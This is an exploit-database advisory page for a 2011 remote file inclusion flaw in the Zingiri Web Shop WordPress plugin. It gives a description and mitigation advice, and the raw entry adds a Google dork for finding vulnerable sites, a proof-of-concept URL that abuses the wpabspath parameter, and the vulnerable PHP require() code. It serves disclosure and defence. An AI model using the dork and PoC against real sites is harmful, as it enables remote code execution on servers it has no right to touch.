header-logo
Suggest Exploit
vendor:
Zingiri Web Shop
by:
Ben Schmidt
7.5
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: Zingiri Web Shop
Affected Version From: 2.2.2000
Affected Version To: 2.2.2000
Patch Exists: YES
Related CWE: N/A
CPE: a:zingiri:zingiri_web_shop
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress
2011

Zingiri Web Shop WordPress plugin RFI

The Zingiri Web Shop Wordpress plugin is vulnerable to a Remote File Inclusion (RFI) vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute it on the vulnerable server. The vulnerable code is located in the init.inc.php file, which is used to initialize the plugin. The code is vulnerable to RFI because it does not properly validate user-supplied input, allowing an attacker to include a malicious file from a remote server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user-supplied input is properly validated. This can be done by using a whitelist of accepted values, or by using a regular expression to validate the input.
Source

Exploit-DB raw data:

# Exploit Title: Zingiri Web Shop Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/zingiri-web-shop
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/zingiri-web-shop/download/
# Version: 2.2.0 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=RFI OR /fwkfor/ajax/init.inc.php?wpabspath=RFI

---
Vulnerable Code
---
if ($_REQUEST['cms']=='jl') {
	define('ZING_CMS','jl');
	$_REQUEST['tmpl'] = 'component';
	$_REQUEST['option'] = 'com_zingiriwebshop';
	ob_start();
	require($_REQUEST['wpabspath'].'/index.php');
	ob_end_clean();
} elseif ($_REQUEST['cms']=='dp') {
	//all bootstrapping is already done
} else {
	if (!defined('ZING_AJAX') || !ZING_AJAX) {
		/** Loads the WordPress Environment */
		//require($_REQUEST['wpabspath'].'wp-blog-header.php');
		require($_REQUEST['wpabspath'].'wp-load.php');
		/** Load Zingiri Web Shop */
		require(dirname(__FILE__).'/../../zing.readcookie.inc.php');
		require(dirname(__FILE__).'/../../startmodules.inc.php');
	}
}

Navigation

Suggest Exploit

Services By CQR